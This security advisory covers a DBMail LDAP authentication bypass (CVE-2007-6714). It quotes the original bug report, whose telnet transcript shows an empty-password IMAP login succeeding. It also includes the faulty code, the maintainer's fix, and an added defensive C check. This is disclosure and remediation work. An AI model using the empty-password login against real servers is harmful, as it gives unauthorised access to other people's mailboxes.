SecurityTracker.com
Category:  Application (E-mail Server)  >  DBMail Vendors:  IC and S (ic-s.nl)
DBMail LDAP Authentication Bug Lets Remote Users Access Arbitrary Mail Accounts
SecurityTracker Alert ID:  1019914
SecurityTracker URL:  http://securitytracker.com/id?1019914
CVE Reference:  CVE-2007-6714   (Links to External Site)
Date:  Apr 22 2008
Impact:  User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): prior to 2.2.9
Description:  A vulnerability was reported in DBMail. A remote user can bypass authentication and access arbitrary IMAP accounts on the target system.

A remote user can send an empty password string to log in to arbitrary IMAP accounts without authenticating.

Systems using the authldap module and an Active Directory LDAP server configured for anonymous logins are affected.

The vulnerability resides in the ldap_bind_s() function in 'modules/authldap.c'.

vugluskr reported this vulnerability.

Impact:  A remote user can access arbitrary IMAP accounts on the target system.
Solution:  The vendor has issued a fix (2.2.9).

The vendor's advisory is available at:

http://www.dbmail.org/index.php?page=news&id=44

Vendor URL:  www.dbmail.org/ (Links to External Site)
Cause:  Authentication error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  bugtrack <bugtrack@dbmail.org>
Message History:   None.


 Source Message Contents

Date:  Sun, 16 Dec 2007 14:27:43 -0800
From:  bugtrack <bugtrack@dbmail.org>
Subject:  [Dbmail-dev] [DBMail 0000662]: Ability to bypass authentication.

 
The following issue has been RESOLVED. 
====================================================================== 
http://dbmail.org/mantis/view.php?id=662 
====================================================================== 
Reported By:                vugluskr
Assigned To:                
====================================================================== 
Project:                    DBMail
Issue ID:                   662
Category:                   Authentication layer
Reproducibility:            always
Severity:                   major
Priority:                   normal
Status:                     resolved
target:                      
Resolution:                 fixed
Fixed in Version:           2.2.9
====================================================================== 
Date Submitted:             16-Dec-07 18:10 CET
Last Modified:              16-Dec-07 23:14 CET
====================================================================== 
Summary:                    Ability to bypass authentication.
Description: 
There is a security hole in the auth procedure. When the authldap module is used and
anonymous login is enabled on the LDAP server, any user can log in to any account
using an empty string as the password.
 
h000 ~ # telnet localhost 143
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
* OK dbmail imap (protocol version 4r1) server 2.2 ready to run
a login [EMAIL PROTECTED] ""
a OK LOGIN completed
a logout
* BYE dbmail imap server kisses you goodbye
a OK completed
Connection closed by foreign host.
 
On the POP3 protocol I was not able to use this vulnerability. I don't know
how to send an empty password via the POP3 protocol.
 
h000 ~ # telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK DBMAIL pop3 server ready to rock
<[EMAIL PROTECTED]>
user [EMAIL PROTECTED]
+OK Password required for [EMAIL PROTECTED]
pass
-ERR your command does not compute
pass ""
-ERR username/password incorrect
quit
+OK see ya later
Connection closed by foreign host.
 
The root of the problem is in the use of the function ldap_bind_s
 
       int ldap_bind_s(LDAP *ld, const char *who, const char *cred,
              int method);
 
If the "cred" argument is "", the LDAP library tries to authenticate as anonymous...
and the bind returns success. So dbmail lets the user into the mailbox.
 
modules/authldap.c:1263
        /* An empty cred makes ldap_bind_s() perform an anonymous bind; AD answers
         * with success, so ldap_err is 0 and the login is recorded as valid. */
        if (ldap_err) {
                TRACE(TRACE_ERROR, "ldap_bind_s failed: %s", ldap_err2string(ldap_err));
                *user_idnr = 0;
        } else {
                db_user_log_login(*user_idnr);
        }
 
There is a patch to fix this issue in the attachment.
 
PS: The LDAP is AD on a win2k3 server.
====================================================================== 
 
---------------------------------------------------------------------- 
 paul - 16-Dec-07 22:55  
---------------------------------------------------------------------- 
Yes. This *only* affects AD, not openldap. I seem to remember fixing this
some time ago. Looks like a regression or I'm having serious deja-vu here
:-( 
 
---------------------------------------------------------------------- 
 paul - 16-Dec-07 23:14  
---------------------------------------------------------------------- 
Patch accepted. Thanks. 
 
Issue History 
Date Modified   Username       Field                    Change               
====================================================================== 
16-Dec-07 18:10 vugluskr       New Issue                                    
16-Dec-07 18:10 vugluskr       File Added: dbmail-2.2.7-ldap_anonbind.patch     
16-Dec-07 22:55 paul           Note Added: 0002451                          
16-Dec-07 23:14 paul           Note Added: 0002452                          
16-Dec-07 23:14 paul           Status                   new => resolved     
16-Dec-07 23:14 paul           Resolution               open => fixed       
16-Dec-07 23:14 paul           Fixed in Version          => 2.2.9           
======================================================================
 
_______________________________________________
Dbmail-dev mailing list
Dbmail-dev@dbmail.org
http://twister.fastxs.net/mailman/listinfo/dbmail-dev
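The two transcripts in the report differ for a protocol reason: the IMAP argument "" is a quoted string that decodes to an empty password, while POP3 "pass """ sends the two quote characters literally. The added C example below (not DBMail's code or the attached patch; function names are hypothetical) shows the defensive check a bind wrapper needs, namely that a decoded empty credential is rejected before ldap_bind_s() is ever reached, so an anonymous bind can never be mistaken for a user login.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical pre-bind guard: an empty or missing credential must never be
 * handed to ldap_bind_s(), because an empty "cred" requests an anonymous bind
 * and an AD server that permits anonymous binds answers it with success.
 * Returns true only when a real simple bind may be attempted. */
bool ldap_credentials_usable(const char *who, const char *cred)
{
    if (who == NULL || who[0] == '\0')
        return false;
    if (cred == NULL || cred[0] == '\0')
        return false;
    return true;
}

/* Minimal decoder for an IMAP LOGIN argument: a quoted string ("" is the
 * empty string, \" and \\ are escapes) or a bare atom taken as-is.
 * Writes the decoded value into out and returns its length, or -1 if the
 * input is malformed or does not fit. */
int imap_decode_astring(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    if (in[0] == '"') {
        const char *p = in + 1;
        while (*p != '\0' && *p != '"') {
            if (*p == '\\' && p[1] != '\0')
                p++;                        /* take the escaped character */
            if (n + 1 >= outlen)
                return -1;
            out[n++] = *p++;
        }
        if (*p != '"')
            return -1;                      /* unterminated quoted string */
    } else {
        n = strcspn(in, " \r\n");
        if (n + 1 > outlen)
            return -1;
        memcpy(out, in, n);
    }
    out[n] = '\0';
    return (int)n;
}

/* Decides whether a raw IMAP LOGIN password argument may proceed to the bind. */
bool imap_login_password_bindable(const char *user, const char *pw_arg)
{
    char pw[256];                           /* decoded password, constructed here */
    if (imap_decode_astring(pw_arg, pw, sizeof pw) < 0)
        return false;
    return ldap_credentials_usable(user, pw);
}
```

The POP3 case is covered by the same guard: the literal two-character password `""` is non-empty, which is why the reporter's POP3 attempt was refused while the IMAP one succeeded.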
 
Copyright 2007, SecurityGlobal.net LLC